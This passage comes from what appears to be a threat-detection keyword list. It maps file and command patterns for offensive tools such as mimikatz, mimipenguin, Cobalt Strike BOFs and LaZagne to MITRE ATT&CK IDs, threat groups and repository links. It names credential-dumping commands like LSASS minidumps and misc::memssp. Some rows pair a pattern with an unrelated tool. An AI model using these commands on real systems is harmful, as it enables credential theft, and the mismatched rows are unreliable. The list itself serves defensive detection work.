collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*mimilove*,offensive_tool_keyword,mimikatz,mimikatz exploitation ,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Credential Access,https://github.com/gentilkiwi/mimikatz,1,0,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*mimilove.exe*,offensive_tool_keyword,mimikatz,mimikatz exploitation ,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Credential Access,https://github.com/gentilkiwi/mimikatz,1,0,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*mimilove.vcxproj*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*mimipenguin*,offensive_tool_keyword,mimipenguin,A tool to dump the login password from the current linux desktop user. Adapted from the idea behind the popular Windows tool mimikatz. This was assigned CVE-2018-20781 (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20781). Fun fact its still not fixed after GNOME Keyring 3.27.2 and still works as of 3.28.0.2-1ubuntu1.18.04.1.,T1555 - T1003 - T1212 - T1558,TA0001 - TA0003,N/A,N/A,Credential Access,https://github.com/huntergregal/mimipenguin,1,1,N/A,N/A,10,3565,645,2023-05-17T13:20:46Z,2017-03-28T21:24:28Z -*mimipenguin.*,offensive_tool_keyword,crossc2,generate CobaltStrike's cross-platform payload,T1547.001 - T1055 - T1027 - T1105 - T1047,TA0002 - TA0005 - TA0011,N/A,N/A,C2,https://github.com/gloxec/CrossC2,1,1,N/A,10,10,1894,321,2023-08-08T20:02:44Z,2020-01-16T16:39:09Z -*mimipenguin.cna*,offensive_tool_keyword,cobaltstrike,generate CobaltStrike's cross-platform payload,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - 
T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/gloxec/CrossC2,1,1,N/A,10,10,1894,321,2023-08-08T20:02:44Z,2020-01-16T16:39:09Z -*mimipenguin.git*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*mimipenguin.py*,offensive_tool_keyword,crackmapexec,A swiss army knife for pentesting networks,T1210 T1570 T1021 T1595 T1592 T1589 T1590 ,N/A,N/A,N/A,POST Exploitation tools,https://github.com/byt3bl33d3r/CrackMapExec,1,1,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*mimipenguin.so*,offensive_tool_keyword,cobaltstrike,generate CobaltStrike's cross-platform payload,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/gloxec/CrossC2,1,1,N/A,10,10,1894,321,2023-08-08T20:02:44Z,2020-01-16T16:39:09Z -*mimipenguin_x32.so*,offensive_tool_keyword,cobaltstrike,generate CobaltStrike's cross-platform 
payload,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/gloxec/CrossC2,1,1,N/A,10,10,1894,321,2023-08-08T20:02:44Z,2020-01-16T16:39:09Z -*mimipy.py*,offensive_tool_keyword,LaZagne,The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.,T1552 - T1003 - T1555,TA0006 - TA0008,N/A,N/A,Credential Access,https://github.com/AlessandroZ/LaZagne,1,1,N/A,10,10,8527,1980,2023-08-12T12:38:22Z,2015-02-16T14:10:02Z -*mimiRatz*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*mimishim.*,offensive_tool_keyword,koadic,Koadic. 
or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*mimispool.dll*,offensive_tool_keyword,mimikatz,mimikatz exploitation ,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Credential Access,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*minidump*minikerberos*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -*minidump.* lsass.dmp*,offensive_tool_keyword,onex,C# implementation of mimikatz/pypykatz minidump functionality to get credentials from LSASS dumps,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Credential 
Access,https://github.com/cube0x0/MiniDump,1,0,N/A,N/A,3,263,48,2021-10-13T18:00:46Z,2021-08-14T12:26:16Z -*Minidump.exe*,offensive_tool_keyword,bof-collection,C# implementation of mimikatz/pypykatz minidump functionality to get credentials from LSASS dumps,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Credential Access,https://github.com/cube0x0/MiniDump,1,1,N/A,N/A,3,263,48,2021-10-13T18:00:46Z,2021-08-14T12:26:16Z -*minidump.exe*,offensive_tool_keyword,deimosc2,DeimosC2 is a Golang command and control framework for post-exploitation.,T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007,TA0011,N/A,N/A,C2,https://github.com/DeimosC2/DeimosC2,1,1,N/A,10,10,1004,158,2023-07-15T05:34:10Z,2020-06-30T19:24:13Z -*Minidump.sln*,offensive_tool_keyword,bof-collection,C# implementation of mimikatz/pypykatz minidump functionality to get credentials from LSASS dumps,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Credential Access,https://github.com/cube0x0/MiniDump,1,1,N/A,N/A,3,263,48,2021-10-13T18:00:46Z,2021-08-14T12:26:16Z -*minidump_add_memory_block*,offensive_tool_keyword,cobaltstrike,Collection of beacon object files for use with Cobalt Strike to facilitate,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - 
T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rookuu/BOFs,1,1,N/A,10,10,156,26,2021-02-11T10:48:12Z,2021-02-11T10:28:48Z -*minidump_add_memory64_block*,offensive_tool_keyword,cobaltstrike,Collection of beacon object files for use with Cobalt Strike to facilitate,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29,C2,https://github.com/rookuu/BOFs,1,1,N/A,10,10,156,26,2021-02-11T10:48:12Z,2021-02-11T10:28:48Z -*minidumpwritedump*,offensive_tool_keyword,cobaltstrike,Collection of beacon object files for use with Cobalt Strike to facilitate,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rookuu/BOFs,1,1,N/A,10,10,156,26,2021-02-11T10:48:12Z,2021-02-11T10:28:48Z -*MiniDumpWriteDump*,offensive_tool_keyword,cobaltstrike,Proof of concept Beacon Object File (BOF) that uses static x64 syscalls to perform a complete in memory dump of a process and send that back through your already existing Beacon communication channel,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 
- T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/xforcered/CredBandit,1,1,N/A,10,10,218,25,2021-07-14T17:42:41Z,2021-03-17T15:19:33Z -*mirrors.aliyun.com/parrot*,offensive_tool_keyword,parrot os,Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.,T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105,TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011,N/A,N/A,Exploitation OS,https://www.parrotsec.org/download/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*misc::aadcookie*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*misc::clip*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. 
PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*misc::cmd*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*misc::compress*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*misc::detours*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*misc::efs*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*misc::lock*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*misc::memssp*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*misc::mflt*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*misc::ncroutemon*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*misc::ngcsign*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*misc::printnightmare*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
